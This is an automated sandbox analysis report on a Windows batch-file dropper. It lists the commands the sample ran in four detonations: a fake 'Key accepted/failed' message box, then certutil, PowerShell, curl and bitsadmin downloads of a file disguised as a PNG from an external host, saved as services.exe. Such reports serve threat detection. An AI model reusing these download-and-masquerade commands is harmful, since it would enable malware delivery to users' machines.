Malware Analysis Report

2024-10-16 05:07

Sample ID: 240726-v8hpjaxbnd
Target: frdddd.bat
SHA256: 6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
Tags: dropper, execution
Score: 8/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 8/10

SHA256: 6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd

Threat Level: Likely malicious

The file frdddd.bat was found to be: Likely malicious.

Malicious Activity Summary

Tags: dropper, execution

Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-26 17:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-26 17:39
Reported: 2024-07-26 17:51
Platform: win7-20240708-en
Max time kernel: 680s
Max time network: 691s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp

Files

memory/2692-4-0x000007FEF460E000-0x000007FEF460F000-memory.dmp
memory/2692-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2692-6-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2692-7-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-9-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-8-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-10-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-11-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-12-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 33699b0d456ab857c654d32bb2e3d0dd
SHA1 41f8ea34091911ce5bd3bb1ae0001b2b7757afe3
SHA256 856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567
SHA512 a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp
MD5 2274ec55bb8524294bd4da2157137a42
SHA1 7ca9c4c80357eaa63a7fc356051808eff70bb445
SHA256 db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe
SHA512 a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8

memory/1464-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/1464-19-0x0000000002340000-0x0000000002348000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-26 17:39
Reported: 2024-07-26 17:48
Platform: win10-20240404-en
Max time kernel: 373s
Max time network: 398s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp

Files

memory/4164-3-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp
memory/4164-5-0x000001867BBB0000-0x000001867BBD2000-memory.dmp
memory/4164-6-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/4164-9-0x000001867BEA0000-0x000001867BF16000-memory.dmp
memory/4164-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxc0pd4w.ekv.ps1
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4164-41-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5 900713b658f108100bb7aa144134dbca
SHA1 7a05dd4d5cd03542c5187c8a3036f30b9d79daf0
SHA256 c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8
SHA512 85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 82bf624e242a520bea827e1597a3b6c3
SHA1 44b39896a849a7a8e959be51b63b260d2a5c2703
SHA256 8b57b809a4849de8c8341d0d1fcfddf0cb39c81f28a081fe95b0f0aa48ad89fa
SHA512 df229348ee2496d9456235ba0aef84431e66be0ec0a5baa7afa5bb7255d527ae632a8fa7c603e3b2bb137f2175728fe678dc745fc885b49dbf1178615476a774

Analysis: behavioral3

Detonation Overview

Submitted: 2024-07-26 17:39
Reported: 2024-07-26 17:47
Platform: win10v2004-20240709-en
Max time kernel: 439s
Max time network: 443s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 40.58.20.217.in-addr.arpa udp
US 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/2616-0-0x00007FF9109F3000-0x00007FF9109F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc3mlmu.fba.ps1
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2616-10-0x000001594BB20000-0x000001594BB42000-memory.dmp
memory/2616-11-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-12-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-15-0x000001594B7D0000-0x000001594B9EC000-memory.dmp
memory/2616-16-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5 614f88cf39eb3223246afec4bf1463b4
SHA1 74d738ee6fdada75ac1ef1645073005e3f6b6cfb
SHA256 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd
SHA512 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 545200acaf2c8f78ae532a89dc92847f
SHA1 ed204ca3305153883b4a6452d3a51ba5a6d145e1
SHA256 70df64fb0f6dd58a197b24edda7d79e43d9f5326dab3559e210ca48f89fef2f2
SHA512 e0eb48db79189689d56b2a845d416b78e4d2dd9f931423f8cfc28ed4d2f032e7b0f192f17e294eddb259f85de99ff8debdc5ef8f86843c50fc8134ee02b178e1

Analysis: behavioral4

Detonation Overview

Submitted: 2024-07-26 17:39
Reported: 2024-07-26 17:42
Platform: win11-20240709-en
Max time kernel: 147s
Max time network: 152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp
N/A 127.0.0.1:49827 tcp
US 108.181.20.37:443 files.catbox.moe tcp
US 108.181.20.37:443 files.catbox.moe tcp

Files

memory/2012-0-0x00007FF82AFF3000-0x00007FF82AFF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgowykvb.lxy.ps1
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2012-9-0x0000029D7C1C0000-0x0000029D7C1E2000-memory.dmp
memory/2012-10-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-11-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-12-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-15-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5 2f33a85941bcb1090d75289d34035310
SHA1 b24a3c2248b575a78c066866768c6a7fb9f8e06c
SHA256 169bb5671a611478cb7dc58e7d1b01a5ce2d354591c4a63e7b191b6e7b6dee6c
SHA512 d6065d75737f4016d876cb4ada85b196b1be70e06b552ebae0d51f7b84a01e87151ae81ba3aa584bfe28ce4df69f62e6a37d3918d2b3b02a7b3ebfb3bf7540b5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 962574549d8b04e5eeda54c5284808d0
SHA1 d37b5af76b44a47e4ce09ea3a3421408a901b7eb
SHA256 063fe32bc457964b5f53515b749bac5b7012469ce0d0b0fd5ece65206b283060
SHA512 7354c6d53d1bc28ad9d027def0e2335a7fab5e02473bf056687dcfc0e3e7b2ad0b3314772747e9b2753d1314ee84ffa220e3e7e310c519d4adede2bba5f1aff6